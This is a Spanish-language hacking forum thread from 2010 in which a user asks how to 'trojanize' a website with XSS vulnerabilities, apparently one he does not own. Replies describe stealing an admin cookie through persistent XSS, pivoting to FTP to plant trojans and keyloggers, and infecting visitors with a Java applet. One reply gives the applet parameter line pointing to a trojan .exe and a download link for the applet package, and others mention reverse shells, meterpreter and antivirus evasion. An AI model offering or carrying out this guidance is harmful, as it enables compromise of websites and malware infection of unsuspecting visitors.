Ayuda! Troyanizar una web.

Iniciado por laiox, 25 Junio 2010, 07:15 AM

0 Miembros y 1 Visitante están viendo este tema.

laiox

hola, antes que nada, gracias por gastar su tiempo en leer mi post :D

bueno la cosa es asi, yo quiero troyanizar una web (Creo q esta bien el termino) q tiene Vulnerabilidades xss...
ya se como encontrar si es vulnerable a xss etc etc pero no encuentro tutos sobre como troyanizar esta web. si pueden dejar link se los agradezco

aaaaaaaa y si no es mucha molestia tmb quiero troyanizar una pagina mia para aprender un poco mas :)

Desde ya muchisimas gracias

Atte. Laiox

Debci

No no esta bien dicho, pues normalmente con un XSS pretendes robar datos comprometdores, si es un XSS persistente, por ejemplo en un DB SQL u otras, puedes conseguir robar la cookie a un admin, y si no es persistente, con un poco de ingenieria social tambien, una vez tienes privilegios en el sistema web, puedes dar saltos mas grandes como por ejemplo al servidor FTP y ahi ya subir tu troyano, keylogger y otros softwares dañinos (malware).

Saludos y se bueno

177600531

Infecta mediante un Applet de Java. Configura la url de index.html con la dirección de donde está alojado tú troyano.

Exactamente esta es la línea que tienes que cambiar:<param name="url" value="http://www.adress.com/troyano.exe"> por la tuya.
Aquí tienes la url para bajar el paquete: http:/www.proxicrack.srw.ro/java.rar

laiox

muchas gracias por responder, pero yo eh leido que se puede hacer que el troyano sea descargado y ejecutado automaticamente sin preguntale al usuario que ingresa, creo q es con un script, si alguien me ayudaria en eso le agradeceria :)

MUCHAS GRACIAS POR RESPONDERME CHICOS :)

ESTA BUENO EL FORO :) FELICITACIONES A LOS ADMINS, MODERADORES, ETC :D

Debci

Cita de: laiox en 26 Junio 2010, 02:10 AM
muchas gracias por responder, pero yo eh leido que se puede hacer que el troyano sea descargado y ejecutado automaticamente sin preguntale al usuario que ingresa, creo q es con un script, si alguien me ayudaria en eso le agradeceria :)

Precisamente esas cosas son las que han corregido el 100% de los lenguajes de programación web, por eso el Java Applet infection es el mejor metodo, pues infectas sind escargar nada, al menos no visualmente, acepta un certificado, y obtienes una reverse shell, o una sesion de meterpreter.

Saludos

laiox

Ah! Muchas gracias ya entendi

;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-) ;-)

jeje

Laiox !

tragantras

Cita de: Debci en 27 Junio 2010, 11:25 AM
Cita de: laiox en 26 Junio 2010, 02:10 AM

Precisamente esas cosas son las que han corregido el 100% de los lenguajes de programación web, por eso el Java Applet infection es el mejor metodo, pues infectas sind escargar nada, al menos no visualmente, acepta un certificado, y obtienes una reverse shell, o una sesion de meterpreter.

Saludos

Claaaaro bypassing A.V así en 1 segundico, el "shikata_ga_nai" ese tan famoso, que supuestamente salta todo, no se a vosotros, pero a mi nunca me ha pasado el AVG :/
Colaboraciones:
1 2